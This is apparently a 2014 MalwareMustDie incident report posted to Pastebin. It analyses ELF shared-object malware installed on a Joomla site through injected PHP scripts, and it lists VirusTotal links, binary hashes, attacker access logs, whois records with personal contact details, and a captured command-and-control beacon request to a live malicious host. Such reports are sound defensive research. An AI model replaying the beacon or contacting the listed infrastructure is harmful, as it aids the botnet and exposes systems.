Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie NEW Report of .SO ELF Malware attack incident.
- # date: Wed Jun 11 06:38:13 JST 2014
- # Analysis by @unixfreaxjp - Report thx to: yin
- # Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
- # CNC is ALIVE in : 89.45.14.64 (VOXILITY, ROMANIA)
- # ATTACKER SOURCE IP: 103.31.186.33 (VOXILITY, ROMANIA) & 31.202.247.234 (Leased line ISP Format, UKRAINE)
- //-------------------------------------
- // PHP HACK INJECTION POC
- // VICTIMS WEBAPP: JOOMLA!
- //-------------------------------------
- // Reported Injected installation .SO Bins
- https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
- https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/
- // Jinxed code installer PHP scripts in pastebin:
- http://pastebin.com/z1K8jxKJ
- http://pastebin.com/Pbsk3ZXU
- // Malware Binaries extracted from installer PHP:
- https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
- https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/
- //-------------------------------------
- // CNC ANALYSIS
- // Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
- //-------------------------------------
- // Extract the bins w/ template:
- $ date
- Wed Jun 11 04:12:11 JST 2014
- $
- $ php ./sodump-template.php
- SO x32 dumped 26848
- SO x64 dumped 27288
- MO x32 dumped 26848
- MO x64 dumped 27288
- $
- $ ls -alF
- total 600
- drwxrwxrwx 2 xxx xxx 512 Jun 11 04:12 ./
- drwxrwxrwx 13 xxx xxx 512 Jun 11 03:59 ../
- -rw-r--r-- 1 xxx xxx 26848 Jun 11 04:12 libworker1-32.so
- -rw-r--r-- 1 xxx xxx 27288 Jun 11 04:12 libworker1-64.so
- -rw-r--r-- 1 xxx xxx 26848 Jun 11 04:12 libworker2-32.so
- -rw-r--r-- 1 xxx xxx 27288 Jun 11 04:12 libworker2-64.so
- $ md5 lib*
- MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
- MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
- MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
- MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
- // noted see only one x32 and one x64 binaries used for multiple injection..
- $ file lib*
- libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
- libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
- libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
- libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
- $
- // CNC:
- POST /kuku/theend.php HTTP/1.0
- Host: erstoryunics.us
- Pragma: 1337
- Content-Length: 84
- R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
- HTTP/1.1 200 OK
- Date: Tue, 10 Jun 2014 22:12:22 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.3.3
- Content-Length: 6
- Connection: close
- Content-Type: text/html; charset=UTF-8
- R,200
- // CNC INFO (NETWORK & GEOIP)
- $ echo `dig +short erstoryunics.us`|bash origin.sh
- Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
- IP Address, City, Country Name, Latitude, longitude, Time Zone
- 89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest
- //-------------------------------------
- // ATTACK TIME RANGE:
- //-------------------------------------
- First session: [22/May/2014:13:01:08 +1000]
- 2nd Session First: [09/Jun/2014:07:50:46 +1000]
- 2nd Session Latest:[10/Jun/2014:04:39:51 +1000]
- //-------------------------------------
- // ATTACKER ACCESS POC & SOURCE IP POC:
- //-------------------------------------
- // Attacker access log aiming the PHP .SO Malware installer PHP script:
- 103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
- 31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
- //-------------------------------------
- // Tracing attacker source IP: 103.31.186.33 (ROMANIA)
- //-------------------------------------
- $ whois 103.31.186.33
- % [whois.apnic.net]
- % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
- % Information related to '103.31.186.0 - 103.31.186.127'
- inetnum: 103.31.186.0 - 103.31.186.127
- netname: Saulhost
- descr: Saulhost Hosting
- country: RO
- admin-c: MT669-AP
- tech-c: MT669-AP
- status: ASSIGNED NON-PORTABLE
- remarks: INFRA-AW
- mnt-by: MAINT-HK-VOXILITY
- mnt-lower: MAINT-HK-VOXILITY
- mnt-routes: MAINT-HK-VOXILITY
- mnt-irt: IRT-VOXILITY-AP
- changed: noc@voxility.com 20130118
- source: APNIC
- irt: IRT-VOXILITY-AP
- address: Dimitrie Pompeiu 9-9A
- address: Building 24
- address: Bucharest 020335
- address: Romania
- e-mail: noc@voxility.com
- abuse-mailbox: noc@voxility.com
- admin-c: VOX100
- tech-c: VOX100
- auth: # Filtered
- mnt-by: MAINT-HK-VOXILITY
- changed: noc@voxility.com 20121015
- source: APNIC
- person: Michael Ter-Sahakyan
- address: Terbatas 14
- address: LV-1011 Riga
- address: Latvia
- country: RO
- phone: +37166163312
- e-mail: abuses@saulhost.com
- nic-hdl: MT669-AP
- remarks: INFRA-AW
- abuse-mailbox: abuses@saulhost.com
- mnt-by: MAINT-HK-VOXILITY
- changed: noc@voxility.com 20130118
- source: APNIC
- //-------------------------------------
- // Tracing attacker source IP: 31.202.247.234 (UKRAINE)
- //-------------------------------------
- $ whois 31.202.247.234
- % This is the RIPE Database query service.
- % The objects are in RPSL format.
- %
- % The RIPE Database is subject to Terms and Conditions.
- % See http://www.ripe.net/db/support/db-terms-conditions.pdf
- % Note: this output has been filtered.
- % To receive output for a database update, use the "-B" flag.
- % Information related to '31.202.192.0 - 31.202.255.255'
- % Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'
- inetnum: 31.202.192.0 - 31.202.255.255
- netname: FORMAT-TV-NET-5
- descr: MSP Format Ltd.
- country: UA
- admin-c: FA4288-RIPE
- tech-c: FA4288-RIPE
- status: ASSIGNED PA
- mnt-by: FORMAT-TV-MNT
- mnt-domains: FORMAT-TV-MNT
- mnt-routes: FORMAT-TV-MNT
- source: RIPE # Filtered
- person: Format Admin
- address: Ukraine Mariupol
- phone: +380629422490
- nic-hdl: FA4288-RIPE
- mnt-by: FORMAT-TV-MNT
- source: RIPE # Filtered
- % Information related to '31.202.247.0/24AS6712'
- route: 31.202.247.0/24
- descr: Leased line ISP Format
- origin: AS6712
- mnt-by: FORMAT-TV-MNT
- source: RIPE # Filtered
- ---
- #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement